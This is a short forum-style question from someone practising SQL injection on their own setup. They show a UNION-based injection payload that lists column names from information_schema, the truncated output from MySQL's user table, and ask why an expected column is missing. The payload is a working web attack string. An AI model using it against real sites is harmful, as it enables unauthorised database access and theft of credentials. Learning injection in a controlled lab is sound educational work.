I'm working on some SQLi for personal education and I keep running into the same problem.
When I use the following injection
bla' union all select '1', group_concat(column_name),'3','4' FROM information_schema.columns WHERE table_name= CHAR(117, 115, 101,114) #
I get all the column names of a table called user ->
Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin
And because it's my own controlled environment I know for a fact that the table contains a column called UserName. Why isn't it listed with the column results?